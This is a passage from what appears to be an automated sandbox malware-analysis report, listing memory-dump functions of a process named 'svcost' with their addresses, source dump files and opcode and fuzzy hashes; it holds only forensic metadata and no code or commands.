                                                                                                • Instruction ID: 66fd33a65a53342e9457e7eeb1ba9fe9990f141b0ca574c772334663aee5b88e
                                                                                                • Opcode Fuzzy Hash: 70db889f35ad44fa37aa8cdc1041670fc71b462fe947f7ed160c448a22d74679
                                                                                                • Instruction Fuzzy Hash: ABE06D30896249EFCB40EBB89959B9DBFB4FB06310F2042ADC406A3221D7340A50CB51
                                                                                                Function 00C437A8 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8fe483d95c2c0b769281d75a617748cd0ad9b0181bc67b9ae5261cb6a26ef80a
                                                                                                • Instruction ID: 1cc8a106af100c8a97202dd93c931e448089dee4c04568c4921171bf76418b8a
                                                                                                • Opcode Fuzzy Hash: 8fe483d95c2c0b769281d75a617748cd0ad9b0181bc67b9ae5261cb6a26ef80a
                                                                                                • Instruction Fuzzy Hash: 8BE0EDB0A092849FDB02DBA0DA15A5CBFB4EB86350F2482DDC80463282C7324A0ACF01
                                                                                                Function 0541D530 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5b18e39c2893a272826dbbf9acbc1d00d790a13e31d7d79c8d4f40d2fb8127ca
                                                                                                • Instruction ID: 6edd0518166c6a120d2c6ad9a26a479a611b6d054a1ee74139c0737542763172
                                                                                                • Opcode Fuzzy Hash: 5b18e39c2893a272826dbbf9acbc1d00d790a13e31d7d79c8d4f40d2fb8127ca
                                                                                                • Instruction Fuzzy Hash: 12E0C974D05208EFCB44DFA8D555A9DFBB5EB48304F10C1AA9C1993340D7329A52DF45
                                                                                                Function 05415C30 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5b18e39c2893a272826dbbf9acbc1d00d790a13e31d7d79c8d4f40d2fb8127ca
                                                                                                • Instruction ID: 0cef4bb9bb896612ddd20f8f82756cb1e948d9b61d7e9b4a8fc2ed47176a4091
                                                                                                • Opcode Fuzzy Hash: 5b18e39c2893a272826dbbf9acbc1d00d790a13e31d7d79c8d4f40d2fb8127ca
                                                                                                • Instruction Fuzzy Hash: CCE0C974E05208EFCB44DFA8D555ADDFBF5EB88300F10C1AA9C1993340D6329A52DF45
                                                                                                Function 0541A3D0 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5b18e39c2893a272826dbbf9acbc1d00d790a13e31d7d79c8d4f40d2fb8127ca
                                                                                                • Instruction ID: b7acca189affe71fa64de8d59591705e7ae1278d23e109aca9503e26489cfd51
                                                                                                • Opcode Fuzzy Hash: 5b18e39c2893a272826dbbf9acbc1d00d790a13e31d7d79c8d4f40d2fb8127ca
                                                                                                • Instruction Fuzzy Hash: 5AE0C974E05208EFCB44DFA9D554A9DFBB5EB48300F10C1AADC1893340D6329A52DF85
                                                                                                Function 00C2C8F0 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e7840d9fea8244bd65969492e7811312846c07e9cb2ee0188e8195d10311e3bb
                                                                                                • Instruction ID: e2416065e034ebb43952bfb23b5dfea119ee1228c220a68d1f31c971ae00b9fd
                                                                                                • Opcode Fuzzy Hash: e7840d9fea8244bd65969492e7811312846c07e9cb2ee0188e8195d10311e3bb
                                                                                                • Instruction Fuzzy Hash: B8F0393480420CEFCB00DF94E950AACBBB5EB48300F10C0A9EC1852350CA329A61EF80
                                                                                                Function 00C2A070 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bac56f017d45e2df28a2eb72fe55fd0080fc5e19ca84d411f964dbb029f5e9d3
                                                                                                • Instruction ID: a52f46275023a6e7eacca765a391996f7db1cf9611a7a3961a3328934f18698f
                                                                                                • Opcode Fuzzy Hash: bac56f017d45e2df28a2eb72fe55fd0080fc5e19ca84d411f964dbb029f5e9d3
                                                                                                • Instruction Fuzzy Hash: 06E06534804208EFCB04CF90E900EADBB75EB48300F108199EC0523250CB329A22EF82
                                                                                                Function 043280CC Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4f6ef43133b244d1684972aa53122282f70930dee48b07fa1d6bee5f5a132d5e
                                                                                                • Instruction ID: c903dd402245ccea2d51796dc52b31a8d55ed5818777d08feb940a4012c51dea
                                                                                                • Opcode Fuzzy Hash: 4f6ef43133b244d1684972aa53122282f70930dee48b07fa1d6bee5f5a132d5e
                                                                                                • Instruction Fuzzy Hash: 72F0D474919328CFDB29DF69CA94A9CBBF6BF44320F1491A9D009A3265D7316D82CF01
                                                                                                Function 0432DB48 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1a3265302cdc39538ab2026a439126f4a6f93a526242fb60f90e8a9ae2e240e0
                                                                                                • Instruction ID: 25fbb85399b5029df1baf8407868041eaa44f09b7d60fd709b362c2289c822dc
                                                                                                • Opcode Fuzzy Hash: 1a3265302cdc39538ab2026a439126f4a6f93a526242fb60f90e8a9ae2e240e0
                                                                                                • Instruction Fuzzy Hash: 1BE08C31740324ABEBA47AB49A20B6632C9DF857A5F211079DB059B280D9B2F80287A1
                                                                                                Function 00C42BC0 Relevance: .0, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fdb9f0fb21711b724a38bfcbcfa9a2bd78dd34ca891d3b7e7c54d44d26fc8387
                                                                                                • Instruction ID: bda65e2a8e97075376f3a6d526a3348668ffed7a2d609d5ea28cbc34ed06a353
                                                                                                • Opcode Fuzzy Hash: fdb9f0fb21711b724a38bfcbcfa9a2bd78dd34ca891d3b7e7c54d44d26fc8387
                                                                                                • Instruction Fuzzy Hash: 6AE02630509248AFC700DB54C826B19BBACEB06340F2080DED40987392C6329E42CB01
                                                                                                Function 00C48DA8 Relevance: .0, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 29c32951a215fbe0f1c1798c0dd4e8ab41dbf71d85765c1bb5a2f48b27c86db5
                                                                                                • Instruction ID: bb90147e9a58765b05582c86c8b2feaf1aa048ffd1b21664f2bb4ef401666ee9
                                                                                                • Opcode Fuzzy Hash: 29c32951a215fbe0f1c1798c0dd4e8ab41dbf71d85765c1bb5a2f48b27c86db5
                                                                                                • Instruction Fuzzy Hash: 56E01A70D06308EFCB44DFA9D504A9DBBB9FB58300F1085AAD814A3380DB359A55DF81
                                                                                                Function 0541FF68 Relevance: .0, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a480fefebbc67d938960f0163881251f275414fb3fd9d3919315f2bd6f1c72c9
                                                                                                • Instruction ID: 172004f8875177d87907ef75549df43ca75cf6b8e174b134e2053e4173c42709
                                                                                                • Opcode Fuzzy Hash: a480fefebbc67d938960f0163881251f275414fb3fd9d3919315f2bd6f1c72c9
                                                                                                • Instruction Fuzzy Hash: 7CE0E534E05208EFCB44DFA8D554AADFBF4EB49304F10C1EA981893340D7329A06CF81
                                                                                                Function 04328C30 Relevance: .0, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f977ec138860ee0c67e315470d955caa3e6d178f21ce4740d58266f9baa6df20
                                                                                                • Instruction ID: 10615d007c21736409d53308a69f4506dba123c18a39b0daf67f33f2fe8e853e
                                                                                                • Opcode Fuzzy Hash: f977ec138860ee0c67e315470d955caa3e6d178f21ce4740d58266f9baa6df20
                                                                                                • Instruction Fuzzy Hash: FDE01234E05218EFCB44DFA8D555A9CF7F4EB48304F10D5E9881893340D735AA45CF41
                                                                                                Function 04325FA0 Relevance: .0, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e323c5de36f650ea205e4ceb7fa440e0a6d22de8884cc573f83a779715cb2273
                                                                                                • Instruction ID: d65d6ae2dc55a3d81f2c9d2215a2170912525f4feb47c258e9b2ffdc711e61d5
                                                                                                • Opcode Fuzzy Hash: e323c5de36f650ea205e4ceb7fa440e0a6d22de8884cc573f83a779715cb2273
                                                                                                • Instruction Fuzzy Hash: 1EE0E570E05308FFCB44DFA8D504A9DBBB9EB48300F1085AA9814A2340D735AA51DF81
                                                                                                Function 043277C0 Relevance: .0, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f977ec138860ee0c67e315470d955caa3e6d178f21ce4740d58266f9baa6df20
                                                                                                • Instruction ID: f621ddafe9264b1e77fea4b36f41ae446e9159ada79709d569f6a881e3fe0e29
                                                                                                • Opcode Fuzzy Hash: f977ec138860ee0c67e315470d955caa3e6d178f21ce4740d58266f9baa6df20
                                                                                                • Instruction Fuzzy Hash: 40E0E534E05208EFCB44DFA8D654AADFBF8FB48304F10C1A98818A3340D732AA02CF81
                                                                                                Function 00C4B938 Relevance: .0, Instructions: 21COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ec202ca795843edadd9eb3b409b35f43eb4fb67c7061bf5e4c61e5e3323ac181
                                                                                                • Instruction ID: 47ad5bb51ef177946601caec9e252d24cc45ae1b24a8d2e06048db7d1465fb21
                                                                                                • Opcode Fuzzy Hash: ec202ca795843edadd9eb3b409b35f43eb4fb67c7061bf5e4c61e5e3323ac181
                                                                                                • Instruction Fuzzy Hash: 7CE0E534905208AFCB04DF95D654AACFBB8EB49310F10C1AA995453341D7329A52EF81
                                                                                                Function 0541FED8 Relevance: .0, Instructions: 21COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d20c48f132d0a4fa6b84a1feffc6cf8534caf0e39c7a939127b358976252122b
                                                                                                • Instruction ID: 9428d953bc94ce45b12d639b86c19de26462a244898a7067fb44e560b77e7b5e
                                                                                                • Opcode Fuzzy Hash: d20c48f132d0a4fa6b84a1feffc6cf8534caf0e39c7a939127b358976252122b
                                                                                                • Instruction Fuzzy Hash: F0E04F74909308EBC704DF94D9559ADBB78EB45300F2091AA9C4457341CB329A46DBA9
                                                                                                Function 04325CC0 Relevance: .0, Instructions: 21COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 82ee534ce735e01eaa37c84703bb23b08091ecfb19399cf88fa47d4a3f7366c3
                                                                                                • Instruction ID: d80668c27dec975239952dbc7a7687f964db21b9e876e425ebf06d1b9965c7e4
                                                                                                • Opcode Fuzzy Hash: 82ee534ce735e01eaa37c84703bb23b08091ecfb19399cf88fa47d4a3f7366c3
                                                                                                • Instruction Fuzzy Hash: A5E09A70D06318EFCB54DFA9E55469DB7F9FB44304F1095E98818A3340E735AA45DF81
                                                                                                Function 04326228 Relevance: .0, Instructions: 21COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ce0036adfa276e7bcad82d5eb6facd1e68a60044b9bd490d855ea8863cb8c31c
                                                                                                • Instruction ID: ad0dedbb8c21190fd99cd157aa7bc3c97df895743d1eae5d036a8d1fbfdb0dab
                                                                                                • Opcode Fuzzy Hash: ce0036adfa276e7bcad82d5eb6facd1e68a60044b9bd490d855ea8863cb8c31c
                                                                                                • Instruction Fuzzy Hash: 48E04F34905308EFCB40DF94D949DADBBB8FF09311F109198E84427320D731AA54DF41
                                                                                                Function 00C46810 Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 59e6b88afb5013396a91161ae280b019969c0cb013f89666b44ed15c28bf860d
                                                                                                • Instruction ID: 9f2779c7f472f84ec38d9e88060525bdf88f8de4d6c6edd6ca989e51981d0d41
                                                                                                • Opcode Fuzzy Hash: 59e6b88afb5013396a91161ae280b019969c0cb013f89666b44ed15c28bf860d
                                                                                                • Instruction Fuzzy Hash: FFE04634905208EBCB04DF94E954DADBF78EB4A314F2081A9D80423381CA329A52DB82
                                                                                                Function 00C4D1A8 Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7a44cc153a73f9c3539c063d36fb664da2c20cfe62a6f391766069aa653b1eb2
                                                                                                • Instruction ID: c44abcc2335ef0bc14872d1820238ffcc833e118cd2f1638ca3c12ee1f76b29b
                                                                                                • Opcode Fuzzy Hash: 7a44cc153a73f9c3539c063d36fb664da2c20cfe62a6f391766069aa653b1eb2
                                                                                                • Instruction Fuzzy Hash: 71E04634C06208EFCB14EFA5E518AADBBB9EB44311F2081AA9C5122340CA315A50EF81
                                                                                                Function 05418818 Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 819565ee4f68f1268c54778f3f906db7c05207f5a40580c7f6f7274f9abd89be
                                                                                                • Instruction ID: df9f41e3eecdf2d59c1687f1ec82e42e1fe96c85c5d2633a23252981c58e542a
                                                                                                • Opcode Fuzzy Hash: 819565ee4f68f1268c54778f3f906db7c05207f5a40580c7f6f7274f9abd89be
                                                                                                • Instruction Fuzzy Hash: A3E01A34D05208EFC704DF94D654AACFBB8EB48204F1081EA9C5853341CB329A02CF45
                                                                                                Function 0541FB08 Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 819565ee4f68f1268c54778f3f906db7c05207f5a40580c7f6f7274f9abd89be
                                                                                                • Instruction ID: 8142fae86f45c9fe26e2ba23570085c5488b9df92ae4a16143eb962cc9d5620e
                                                                                                • Opcode Fuzzy Hash: 819565ee4f68f1268c54778f3f906db7c05207f5a40580c7f6f7274f9abd89be
                                                                                                • Instruction Fuzzy Hash: 0EE01A34D05208AFC704DF94D664AACFBB8EB88204F1081EA8C1953341CA32AA06CF55
                                                                                                Function 00C2F188 Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b140463b8685852ccfc4eabeb955a807b1c2b68faf180f14f26b33d6eb2bdb2d
                                                                                                • Instruction ID: 3248347a0d5d4abec667de67e6b53cb76da109cafbe252fa45c2b65f13e30bd0
                                                                                                • Opcode Fuzzy Hash: b140463b8685852ccfc4eabeb955a807b1c2b68faf180f14f26b33d6eb2bdb2d
                                                                                                • Instruction Fuzzy Hash: 72E04634909208EBDB04DF94E9549ADBB79EB45300F2081BD980423340CA329A62DB81
                                                                                                Function 00C2D938 Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 432ee0875b18033ba97e5e71ec8a5a3d8e2718e920d5ca010ed815f87ecaed7a
                                                                                                • Instruction ID: bc5623650324679a1e091b577ed783e89494ba3d893c79b2b677e93ee43f5e2d
                                                                                                • Opcode Fuzzy Hash: 432ee0875b18033ba97e5e71ec8a5a3d8e2718e920d5ca010ed815f87ecaed7a
                                                                                                • Instruction Fuzzy Hash: A6E04F30911208DFCB40EFA8D554AACBBF4EB08304F2080A9980993340DA329A45CB41
                                                                                                Function 00C2D3C0 Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 432ee0875b18033ba97e5e71ec8a5a3d8e2718e920d5ca010ed815f87ecaed7a
                                                                                                • Instruction ID: 52f349eefd2a8c6700d54aa61d419b0cc96ca71991bf1bf085a787b00d7d81ba
                                                                                                • Opcode Fuzzy Hash: 432ee0875b18033ba97e5e71ec8a5a3d8e2718e920d5ca010ed815f87ecaed7a
                                                                                                • Instruction Fuzzy Hash: 5DE0BF38915218DFC744DFA9D555A5CBBF4EB48304F2085A98809D3351D6729E45CF41
                                                                                                Function 00C2D790 Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 432ee0875b18033ba97e5e71ec8a5a3d8e2718e920d5ca010ed815f87ecaed7a
                                                                                                • Instruction ID: b82af2e7f376cac19af15089f7954452e1b405cb52f2aa9dbf1d0225a1e7492e
                                                                                                • Opcode Fuzzy Hash: 432ee0875b18033ba97e5e71ec8a5a3d8e2718e920d5ca010ed815f87ecaed7a
                                                                                                • Instruction Fuzzy Hash: 0DE0B634915218EFC744EFA8E955AACFBF8EB48704F2085E99809D3341EA329A46CB41
                                                                                                Function 00C29FA8 Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0ab1479c4f4c36613f13d8b7aad144ade8f6bfe5c92244d7995b015d73da5311
                                                                                                • Instruction ID: 3af0341c287f0cd90ac9ce7740790915924af0f4ccdd36b2a83b70e9e0c79e6c
                                                                                                • Opcode Fuzzy Hash: 0ab1479c4f4c36613f13d8b7aad144ade8f6bfe5c92244d7995b015d73da5311
                                                                                                • Instruction Fuzzy Hash: F4E04F34D05208EFC744DFD5E654AACFBB8EB48304F10C1E9D81893341CA329A02DF41
                                                                                                Function 04327130 Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e2a1bd194bc97b1a7f8b1a80679700731162ac4f5db0395667b70d682359d68c
                                                                                                • Instruction ID: 98d42f0f26f5219240e2ce3339defe7f14f445b6af7338a1858d528cd30766fe
                                                                                                • Opcode Fuzzy Hash: e2a1bd194bc97b1a7f8b1a80679700731162ac4f5db0395667b70d682359d68c
                                                                                                • Instruction Fuzzy Hash: D7E0E634A05218DFC744DFA8DA55A5CFBF8EF49305F1495E9C818D3341E732AA45CB51
                                                                                                Function 00C455D8 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6761de6f9c2263e099d244fd11e260a32e7a72d16ed6b072dc2a6f76a9b77693
                                                                                                • Instruction ID: 7656352981247d1e6d8dcc247210167d9e2918c5f90127c14aa3cb6cdd236f60
                                                                                                • Opcode Fuzzy Hash: 6761de6f9c2263e099d244fd11e260a32e7a72d16ed6b072dc2a6f76a9b77693
                                                                                                • Instruction Fuzzy Hash: A5E0EC74905208DBC704DF94EA55A6DBB79EB45304F2091A9880917341CA329E46DB85
                                                                                                Function 00C4CEB8 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a1ac48e857b081e55c58b5afb49cebf8c4aa86a9d7a74ffa9826a658e1b8f7c5
                                                                                                • Instruction ID: 9eef59ddd1d825703b61359bef1b14cb5073c1cbdc2d3830b0e01177ef03abdb
                                                                                                • Opcode Fuzzy Hash: a1ac48e857b081e55c58b5afb49cebf8c4aa86a9d7a74ffa9826a658e1b8f7c5
                                                                                                • Instruction Fuzzy Hash: AAE0EC3495630DDFCB40DFA8D999A9DBBB8EB05301F1041A98809A3250EB315A44CB51
                                                                                                Function 0541B248 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
